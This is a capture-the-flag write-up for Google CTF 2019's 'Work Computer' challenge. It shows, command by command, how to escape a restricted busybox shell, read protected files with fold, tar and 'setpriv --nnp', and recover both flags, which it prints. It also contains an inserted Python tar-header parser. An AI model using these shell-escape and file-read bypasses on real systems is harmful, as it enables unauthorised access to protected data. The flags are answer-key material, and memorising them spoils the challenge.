Google CTF 2019
Work Computer
With the confidence of conviction and decision making skills that made you a contender for Xenon’s Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is “Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?” You always were one for the trivialities of things. Also presented is an image of a fascinating round and bumpy creature, labeled “Cauliflower for cWo” – are “Cauliflowers” earthlings? Your 40 hearts skip a beat – these are not the strange unrelatable bipeds you imagined earthings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party? SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower. That is, *if* they can learn to navigate such things.
readme.ctfcompetition.com 1337
You can find all my CTF solutions here.
I connect to readme.ctfcompetition.com 1337 using the nc command.
```
nc readme.ctfcompetition.com 1337
```
This opens a Unix terminal, and the current directory has the README.flag and ORME.flag files. I couldn't open these files using nano, vim, cat, strings, or file. These commands don't work. After that, I searched for file read commands on the https://gtfobins.github.io/ website. I figured out the fold command. When I tried to call the fold command, it worked.
```
fold -w10000 README.flag
CTF{4ll_D474_5h4ll_B3_Fr33}
```
I found the flag. But when I tried to open ORME.flag, I saw the permission denied message.
```
fold -w10000 ORME.flag
fold: ORME.flag: Permission denied
```
So this question also has a different way to solve it.
When I searched a little, I saw the bin folder. That folder contains binaries. I tried to find familiar binaries. Tar is one of the familiar binaries for me. When I tried tar:
```
tar c README.flag
README.flag0000400000247200024720000000003413507124515010416 0ustar 13381338CTF{4ll_D474_5h4ll_B3_Fr33}
```
I found the flag, but I still couldn't open ORME.flag.
```
tar c ORME.flag
tar: can't open 'ORME.flag': Permission denied
tar: error exit delayed from previous errors
```
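The bytes tar printed for README.flag above are a ustar header followed by the file data. The following added example (not part of the original write-up) decodes those header fields in Python, showing that the octal strings in the output mean mode 0400, uid and gid 1338, and a size of 28 bytes. The sample archive is constructed from the values visible in that output, and the function names are hypothetical.

```python
import io
import tarfile

# ustar header layout: (field, offset, length) inside the 512-byte block.
FIELDS = [("name", 0, 100), ("mode", 100, 8), ("uid", 108, 8), ("gid", 116, 8),
          ("size", 124, 12), ("mtime", 136, 12), ("chksum", 148, 8),
          ("typeflag", 156, 1), ("magic", 257, 6), ("uname", 265, 32)]
OCTAL = {"mode", "uid", "gid", "size", "mtime", "chksum"}

def parse_header(block):
    """Decode one 512-byte header; numeric fields are octal ASCII digits."""
    if len(block) != 512:
        raise ValueError("header block must be 512 bytes")
    out = {}
    for field, off, length in FIELDS:
        text = block[off:off + length].split(b"\0", 1)[0].decode("ascii").strip()
        out[field] = int(text or "0", 8) if field in OCTAL else text
    # Checksum = sum of all header bytes, with the chksum field taken as spaces.
    out["chksum_ok"] = out["chksum"] == sum(block[:148]) + 8 * 0x20 + sum(block[156:])
    return out

def read_members(archive):
    """Return [(header, data)] for each member up to the zero-filled end block."""
    members, pos = [], 0
    while pos + 512 <= len(archive) and any(archive[pos:pos + 512]):
        hdr = parse_header(archive[pos:pos + 512])
        members.append((hdr, archive[pos + 512:pos + 512 + hdr["size"]]))
        pos += 512 + (hdr["size"] + 511) // 512 * 512  # data is padded to 512
    return members

def build_sample():
    """Constructed archive using the field values visible in the output above."""
    content = b"CTF{4ll_D474_5h4ll_B3_Fr33}\n"
    info = tarfile.TarInfo("README.flag")
    info.mode, info.uid, info.gid, info.size = 0o400, 1338, 1338, len(content)
    info.uname = info.gname = "1338"
    info.mtime = 0o13507124515
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

if __name__ == "__main__":
    for hdr, data in read_members(build_sample()):
        print(hdr["name"], oct(hdr["mode"]), hdr["uid"], hdr["gid"], hdr["size"], data)
```

The owner uid 1338 recovered from the header is the same uid that owns the setuid `shell` binary in the `ls -la` listing further down.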
I need root permission.
I searched the folders and noticed this message when I tried to open the challenge_setup folder in the srv folder:
```
> cd ../srv/
> ls
challenge_setup
> cd challenge_setup
error: Permission denied
>
```
It could be related to ORME.flag.
In the bin folder, when I use the ls -la command:
```
ls -la
total 808
drwxr-xr-x  2 65534 65534   4096 Jun 13 14:28 .
drwxr-xr-x 20 0     0       4096 Jun 13 14:28 ..
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 arch -> /bin/busybox
-rwxr-xr-x  1 65534 65534 796240 Jan 24 07:45 busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 chgrp -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 chown -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 conspy -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 date -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 df -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 dmesg -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 dnsdomainname -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 dumpkmap -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 echo -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 false -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 fdflush -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 fsync -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 getopt -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 hostname -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 ionice -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 iostat -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 ipcalc -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 kill -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 login -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 ls -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 lzop -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 makemime -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 mkdir -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 mknod -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 mktemp -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 mount -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 mountpoint -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 mpstat -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 netstat -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 nice -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 pidof -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 ping -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 ping6 -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 pipe_progress -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 printenv -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 ps -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 pwd -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 reformime -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 rm -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 rmdir -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 run-parts -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 setpriv -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 setserial -> /bin/busybox
-r-sr-xr-x  1 1338  1338   19936 Jun 13 12:48 shell
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 sleep -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 stat -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 stty -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 sync -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 tar -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 true -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 umount -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 uname -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 usleep -> /bin/busybox
lrwxrwxrwx  1 65534 65534     12 May  9 20:49 watch -> /bin/busybox
```
I figured out that every binary calls the busybox binary. When I call it:
```
> busybox
busybox can not be called for alien reasons.
```
I also figured out the setpriv binary.
```
setpriv
BusyBox v1.29.3 (2019-01-24 07:45:07 UTC) multi-call binary.

Usage: setpriv [OPTIONS] PROG [ARGS]

Run PROG with different privilege settings

        -d,--dump               Show current capabilities
        --nnp,--no-new-privs    Ignore setuid/setgid bits and file capabilities
        --inh-caps CAP,CAP      Set inheritable capabilities
        --ambient-caps CAP,CAP  Set ambient capabilities
```
Using setpriv, I can call binaries that need root permission.
YESSS
```
setpriv --nnp busybox
BusyBox v1.29.3 (2019-01-24 07:45:07 UTC) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.

Usage: busybox [function [arguments]...]
   or: busybox --list[-full]
   or: busybox --install [-s] [DIR]
   or: function [arguments]...

        BusyBox is a multi-call binary that combines many common Unix
        utilities into a single executable. Most people will create a
        link to busybox for each function they wish to use and BusyBox
        will act like whatever it was invoked as.

Currently defined functions:
        [, [[, acpid, add-shell, addgroup, adduser, adjtimex, arch, arp,
        arping, ash, awk, base64, basename, bbconfig, beep, blkdiscard,
        blkid, blockdev, brctl, bunzip2, bzcat, bzip2, cal, cat, chgrp,
        chmod, chown, chpasswd, chroot, chvt, cksum, clear, cmp, comm,
        conspy, cp, cpio, crond, crontab, cryptpw, cut, date, dc, dd,
        deallocvt, delgroup, deluser, depmod, df, diff, dirname, dmesg,
        dnsdomainname, dos2unix, du, dumpkmap, dumpleases, echo, ed, egrep,
        eject, env, ether-wake, expand, expr, factor, fallocate, false,
        fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgrep, find,
        findfs, flock, fold, free, fsck, fstrim, fsync, fuser, getopt,
        getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump,
        hostid, hostname, hwclock, id, ifconfig, ifdown, ifenslave, ifup,
        init, inotifyd, insmod, install, ionice, iostat, ip, ipaddr, ipcalc,
        ipcrm, ipcs, iplink, ipneigh, iproute, iprule, iptunnel, kbd_mode,
        kill, killall, killall5, klogd, less, link, linux32, linux64, ln,
        loadfont, loadkmap, logger, login, logread, losetup, ls, lsmod,
        lsof, lspci, lsusb, lzcat, lzma, lzop, lzopcat, makemime, md5sum,
        mdev, mesg, microcom, mkdir, mkdosfs, mkfifo, mkfs.vfat, mknod,
        mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount,
        mountpoint, mpstat, mv, nameif, nanddump, nandwrite, nbd-client, nc,
        netstat, nice, nl, nmeter, nohup, nologin, nproc, nsenter, nslookup,
        ntpd, od, openvt, partprobe, passwd, paste, patch, pgrep, pidof,
        ping, ping6, pipe_progress, pkill, pmap, poweroff, powertop,
        printenv, printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate,
        rdev, readahead, readlink, readprofile, realpath, reboot, reformime,
        remove-shell, renice, reset, resize, rev, rfkill, rm, rmdir, rmmod,
        route, run-parts, sed, sendmail, seq, setconsole, setfont,
        setkeycodes, setlogcons, setpriv, setserial, setsid, sh, sha1sum,
        sha256sum, sha3sum, sha512sum, showkey, shred, shuf, slattach,
        sleep, smemcap, sort, split, stat, strings, stty, su, sum, swapoff,
        swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, tee,
        test, time, timeout, top, touch, tr, traceroute, traceroute6, true,
        truncate, tty, ttysize, tunctl, udhcpc, udhcpc6, umount, uname,
        unexpand, uniq, unix2dos, unlink, unlzma, unlzop, unshare, unxz,
        unzip, uptime, usleep, uudecode, uuencode, vconfig, vi, vlock,
        volname, watch, watchdog, wc, wget, which, whoami, whois, xargs,
        xxd, xzcat, yes, zcat
```
Finally I can call busybox, and it also has the cat binary. Tar is fine 🙂
```
setpriv --nnp tar c challenge_setup
challenge_setup/0000500000000000000000000000000013500443047011232 5ustar 00challenge_setup/this_directory_is_not_part_of_the_challenge0000400000000000000000000000015113500133165022133 0ustar 00This directory is not part of the challenge. Seriously. It's just needed for some setup. Use /challenge.
challenge_setup/README.flag0000400000000000000000000000003413475465777013052 0ustar 00CTF{4ll_D474_5h4ll_B3_Fr33}
challenge_setup/ORME.flag0000400000000000000000000000004113475465777012655 0ustar 00CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}
```
FLAGS:
CTF{4ll_D474_5h4ll_B3_Fr33}
CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}